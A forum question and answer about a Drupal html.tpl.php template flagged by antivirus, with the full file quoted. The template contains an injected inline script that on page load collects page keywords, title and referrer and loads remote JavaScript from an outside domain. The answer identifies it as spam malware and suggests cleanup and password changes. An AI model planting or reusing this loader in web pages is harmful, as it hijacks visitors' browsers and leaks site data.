David Smith David Smith - 10 days ago 7
PHP Question

PHP malware inside this apparently clean file?

I have a

PHP
file (
html.tpl.php
) inside a module for
Drupal
, with the following code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
"http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>

<head profile="<?php print $grddl_profile; ?>">
<?php print $head; ?>
<title><?php print $head_title; ?></title>
<?php print $styles; ?>
<?php print $scripts; ?>

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body class="<?php print $classes; ?>" <?php print $attributes;?>>
<div id="skip-link">
<a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
</div>
<?php print $page_top; ?>
<?php print $page; ?>
<?php print $page_bottom; ?>
</body>
</html>


My problem is that some antiviruses flag it as a malware.

Please, check this virustotal report.

Could be this flag maybe because the
script
inclusion of:

http://atelier24-gerd-kallhardt.de/js/jquery.min.php
?

The file
html.tpl.php
lives on:
/modules/system/
(Drupal website).

You can download this file from here.

Then I have some questions:


  • Is this a legitimate file (despite a possible infection)?

  • It was infected?

  • Is there good and bad (malware) code?

  • How can I remove the bad part?, just by deleting that line of code, with:
    script
    ?

  • How this code could got attached there?


Answer

That happened to me too. Some malware is searching for HTML opening file in dir structure I guess and found this one first. Luckily, the one that was really used, from my theme wasn't infected.

Search for that "atelier" text in all your files or some other string that came with this malware.

It's not specially bad, but just spammer.

Change all back-end admin and (S)FTP passwords and do backups on regular bases.

If you are on shared host..hmm...may be that some other website was hacked, not yours.

Comments